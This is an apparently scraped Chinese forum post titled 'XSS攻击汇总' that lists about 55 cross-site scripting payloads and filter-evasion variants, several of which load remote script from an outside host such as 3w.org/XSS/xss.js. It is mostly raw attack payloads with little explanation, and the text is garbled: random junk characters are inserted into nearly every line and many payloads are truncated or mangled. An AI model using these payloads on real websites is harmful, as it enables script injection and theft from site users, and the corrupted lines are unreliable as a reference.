中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]
作者: admin    时间: 2016-4-28 10:06
标题: XSS攻击汇总
(1)普通的XSS JavaScript注入( e+ n# S; L/ ]5 ]$ J
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 z% n( ^% a8 [! i) P# u; U3 p(99)另类弹框
2 d0 x, J1 t2 f, _. ?3 u1 J<q/oncut=alert()>1
$ I$ x$ `' Y, N3 [" q<s/onclick=alert()>b
8 \8 Y. O- N2 r4 q! x6 L <XSS=" onclick="alert(1)//">clickme</SSX=">. ?+ ]. u( G; i3 D6 X
<zzz onclick=alert`1`>clickme</zzz>
$ I# _8 {! \! y3 t" `  W; ] <a onclick=alert`1`>clickme</a>
2 e& K! E; y- e( C/ [6 j* i& \! t<a=">clickme</a=">0 f% k2 u& T$ s' p1 P5 ]
<a=">clickme</a>
0 t0 y( Z6 R7 w9 {0 g<z=">clickme</z=">9 U! Y  o, _7 Q% d
<z onclick=alert`1`>clickme</z>$ I& T1 q+ \- h, Z

1 L: O+ `, p: h' y8 N1 u(2)IMG标签XSS使用JavaScript命令$ d* N3 p$ N: k4 w- r5 i$ s2 W
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 n2 m0 K3 t& S; }
& v/ B6 H8 y) ]  u(3)IMG标签无分号无引号0 C7 D9 k8 B: y. a- y$ n
<IMG SRC=javascript:alert(‘XSS’)>% U3 V- ~* P5 |( e0 z/ j

4 f+ ?8 c: u) t9 F- [1 Z) W(4)IMG标签大小写不敏感
3 y8 w' ?& F% k5 w; D<IMG SRC=JaVaScRiPt:alert(‘XSS’)>9 a4 W' Q& ~8 m6 R1 b
7 {0 }. h* Q4 [  ^  `
(5)HTML编码(必须有分号)8 Z- e1 M, [( u( a9 t4 O, {
<IMG SRC=javascript:alert(“XSS”)>- e4 r  J+ `2 |5 Y$ W1 x
, a$ U- S5 `6 A) w' ^
(6)修正缺陷IMG标签
9 C: d. ?3 y8 r; p& L2 ]! _% b<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
* i" O- ]  c# t3 Z  E$ x% ^9 {. L6 a. m5 v3 v/ M; Z
(7)formCharCode标签(计算器)
( B( R+ F, L( h: d% g<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>4 y9 w. v- S, t+ E+ {% j+ k
/ m' [. W: j# L
(8)UTF-8的Unicode编码(计算器)) E8 q1 _8 N" f. A% W
<IMG SRC=jav..省略..S')>$ _* x& o4 Z# ?! B
6 m0 ]* m  n' k0 X$ m4 I' }
(9)7位的UTF-8的Unicode编码是没有分号的(计算器), G/ W* O4 ]- J# h% }7 L% s: A# F
<IMG SRC=jav..省略..S')>* o! U6 }; Y! g

( K6 \0 o$ ~6 q; _8 r+ z$ L% r" `(10)十六进制编码也是没有分号(计算器)  w, {. s' ^# t+ ~; R  C
<IMG SRC=\'#\'" /span>: Z5 G9 ~# [% u; X6 V0 D1 j
$ l8 ?, F: O+ P5 ^2 D" e2 Z
(11)嵌入式标签,将Javascript分开
1 o; ]/ M( U0 j2 @3 W( }. a; Z<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
5 Z$ ]8 c, @( f$ }4 B1 L5 m3 U  e; `+ |" H2 s
(12)嵌入式编码标签,将Javascript分开! B! ]# ^/ L/ ]: n3 q/ t
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>" N7 l: L9 L8 S( D# r

$ x  W  G+ U$ s* W* h& Z; |(13)嵌入式换行符; B( L, A( J. t
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>% K( b2 x& [9 h# e
1 s& A9 ~  V- I3 n; J# V/ ^
(14)嵌入式回车
( F( v1 F5 I, ?6 k<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>0 J6 f8 Q. a* R0 M4 m- X* ^

/ W$ ^2 u8 L, v. F5 X& C% Q# N(15)嵌入式多行注入JavaScript,这是XSS极端的例子
0 D6 Y; C3 b8 Y# B5 G' f) B. {7 Z<IMG SRC=\'#\'" /span>7 H% n- s1 |  M- I2 M2 C7 g
+ j1 b; F* Y1 \* q! h
(16)解决限制字符(要求同页面)/ Y( M" R/ ?! h) L
<script>z=’document.’</script>
4 s5 [+ D2 O& r<script>z=z+’write(“‘</script>, X) n  z, V0 j2 y3 C
<script>z=z+’<script’</script>
# F. {& Z- P; B$ ?" ^& V% A<script>z=z+’ src=ht’</script>: d0 d8 U* `( ^8 p4 q% k( E. X
<script>z=z+’tp://ww’</script>
8 U  h% Y9 G" R<script>z=z+’w.shell’</script>2 T/ H9 ]7 D; [; Q( x6 y3 j
<script>z=z+’.net/1.’</script>9 T% k% M/ l& O/ G$ O4 s+ |
<script>z=z+’js></sc’</script>
8 h1 d+ u0 b8 g- z<script>z=z+’ript>”)’</script>9 L3 l) x' Q5 F/ r) S7 G
<script>eval_r(z)</script>
& z$ `* J7 a) W; t) \, c7 g2 S; _' H, Y" e+ a# R
(17)空字符
8 ~5 H0 ^, c$ U8 a7 e, _, Mperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
4 @1 g% Y- o2 E0 b  n+ v$ _# w9 B3 x5 G: z2 P/ o% B. _  F
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用2 w) X* c5 E4 I2 l
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
2 n5 S/ M& I2 h7 z7 u
2 B( M& u5 N6 y' G) f(19)Spaces和meta前的IMG标签, a; l7 _0 `! h5 }- H: ~
<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>: s- a1 Z* c4 z1 Y! s* J" m3 m

' i2 {6 R1 A& x(20)Non-alpha-non-digit XSS8 z. Y# F/ v0 V) S, k5 A
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
. [2 d2 x; g( i( r! n6 E# ?9 w3 J* S# c  y0 m  I* c$ N
(21)Non-alpha-non-digit XSS to 2
) x$ P  u" W( R0 F<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
& Z8 u4 \+ K! ~, P. r# k9 R6 \$ E! m0 [4 ]
(22)Non-alpha-non-digit XSS to 3
% g+ o# Q; Z1 i# b8 I% {( }<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>0 x+ D' h# p- r

0 |) T9 P% V& V7 z; g  z* B- {' {7 D(23)双开括号/ F3 g" d. f- A  r- D
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
5 @" {8 s- a" ?. L
0 {4 v: m) _% c' u; {- b# e(24)无结束脚本标记(仅火狐等浏览器); ?2 |8 N; H5 @# }" `! h
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>' B& R1 p" i( X* e7 @/ c. `  l

$ d! ^& `/ D0 q8 r1 [(25)无结束脚本标记2$ L5 ~6 g9 V$ o, `+ f3 o
<SCRIPT SRC=//3w.org/XSS/xss.js># N: x0 O/ G# R9 H# x

& W3 O9 Z# F9 U(26)半开的HTML/JavaScript XSS
3 M; R$ F; L0 v6 `  U' b- w. `<IMG SRC=\'#\'" /span>8 i5 @) H6 d$ \

1 W" k7 ^  e0 \(27)双开角括号
. w$ C* @/ c9 U0 A% p  U6 z# r/ ]6 w<iframe src=http://3w.org/XSS.html <& N7 N$ j+ }8 h$ y  y* C9 J  T

/ Z& y3 z4 `  U) u5 I, j(28)无单引号 双引号 分号& c3 N' _& t/ q; Z6 a7 e3 ]
<SCRIPT>a=/XSS/  y2 o; `$ r$ b  A
alert(a.source)</SCRIPT>
6 Z4 k% }  h! w, r2 C4 A. }
: T8 K* j+ s4 C9 A- l(29)换码过滤的JavaScript, `" }4 y) |! O
\”;alert(‘XSS’);//
. O" \' F6 \2 F4 U8 S7 ?& }. Q; ^1 `( f) e9 E
(30)结束Title标签$ D! p9 `0 r% V5 e
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
! f! S+ G8 L# L( ~% m+ g- \/ |
/ l1 `8 e1 P/ r- v(31)Input Image- F4 d4 j0 F: ]; V
<INPUT SRC=\'#\'" /span>! y& _9 y. n1 R9 a, H
! Y. y# g$ ^1 i5 F1 |& T& N) Y
(32)BODY Image: D# G1 b6 |- k) P: q
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>4 `# U( k3 ]7 y- I. d
& g( ?) d& ?8 d1 k, x8 F7 ^
(33)BODY标签
9 Y0 S% g/ m7 B4 D/ Y<BODY(‘XSS’)>
* r' [1 S+ D/ o" L9 I6 x+ `0 S  y- q0 C
(34)IMG Dynsrc2 S" L" ^; [4 Z
<IMG DYNSRC=\'#\'" /span>
! S1 m8 D, y8 K, F7 I7 ~7 r
2 D5 C6 h" A3 p8 \(35)IMG Lowsrc
+ b9 _; K3 U8 ], c3 }% V<IMG LOWSRC=\'#\'" /span>0 b( a( ^1 T9 S0 D1 L
+ C. L7 F$ T0 V, T- t) P! Z
(36)BGSOUND
* W: v0 E: Y, h9 ?<BGSOUND SRC=\'#\'" /span>
# E# r4 V6 [* I* T: h
: F3 M/ v7 l8 L& W9 Q! Q(37)STYLE sheet
$ R) f/ j) ~) y2 J' D5 r<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>1 a4 ^# J  L+ Y1 h9 l7 P

- [5 y/ L: j2 Q4 ~# Q% q8 K$ C(38)远程样式表
. x* j8 h% u7 Z2 n$ _, N& S$ c* q<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
" d+ J9 i4 R- \  W: H" J; W' m# _: D
(39)List-style-image(列表式)( S$ K8 |! c* x
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS) m# `! R. }% o7 t2 {" P. P- ~

1 w! W" p4 Q, C& ~(40)IMG VBscript
7 A  z2 C- W4 P* Z$ R5 ~8 x<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
& R1 s1 q0 ?* s, s1 F( x/ w- q( u- ^7 M" M0 B
(41)META链接url
0 H% A% @; ~- c( w; |0 X5 U" r0 o<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
9 a4 D  ~6 e% ^
0 h/ G4 @9 g, F6 J& X( k0 J9 m4 m(42)Iframe
  w5 }4 O, E8 O3 L, R2 u& d: }6 |<IFRAME SRC=\'#\'" /IFRAME>
1 _+ h3 c# J& p7 \( T# A( n% d6 b) M+ d  I4 B
(43)Frame
" H/ T. c- }6 X  x" J<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
1 ]  B7 i. j% k0 R, x4 t( i
2 r; {" j  m7 y: X( s. Y(44)Table* p/ g2 p# s3 |/ D
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
$ o4 x% ?5 ?2 e8 N: ]! l1 E; Z; s6 F! [& m3 V
(45)TD
% r- K/ K+ V" g6 N<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>! o" e& B8 H2 k

! X# s" d+ O9 r' T(46)DIV background-image. X- `1 G2 R5 [' U8 A2 Y8 N
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>/ z! A9 n' a4 M: T9 U
9 ?7 L, M# F. |9 c- F$ D( M( U
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)7 _4 x5 S0 U+ s7 Y- @# \& w
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>, @$ A: G+ Y+ H3 j" o7 C

0 V( ]- k3 k- V5 s8 w(48)DIV expression7 o0 v8 c% \3 a* ^3 D
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>& P0 I8 T9 q* O3 E

# P" W' n) h) p( y3 d3 J7 [# M(49)STYLE属性分拆表达8 j1 @% S( D+ c4 }
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
: T- f% b* y' V
  G6 s9 W: ?' j& ^+ G2 P1 t(50)匿名STYLE(组成:开角号和一个字母开头)
7 m. @7 n# k. P, `- S<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>$ Q3 E. Z: }6 [

3 F! ?, T9 p0 u  {/ o: }(51)STYLE background-image. d+ t: }* g* g1 F; o$ Z  q
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>' \: z6 c7 ]4 k1 X9 C

3 {# T  H" r% w2 E1 ^1 }(52)IMG STYLE方式
# H) }5 F0 k$ P% uexppression(alert(“XSS”))’>
) m' Z0 |! o: `: E. w
0 T2 f" I6 p8 Z- L) d$ U0 s7 T+ ~(53)STYLE background
- P" B# w% \3 K& C8 j<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
1 [7 Q- ^. P/ s. S
7 R7 c& A, a6 v5 j; @1 h4 M(54)BASE% _9 a, D, p* m. L3 h
<BASE HREF=”javascript:alert(‘XSS’);//”>
% o$ x# X$ l) r- \# S/ j4 I
% z; H7 h# R* G; f% j! l5 X1 f(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS1 q* |( L+ g: _, X& s5 Q
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
  }! w6 G3 Z* `. h; {



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2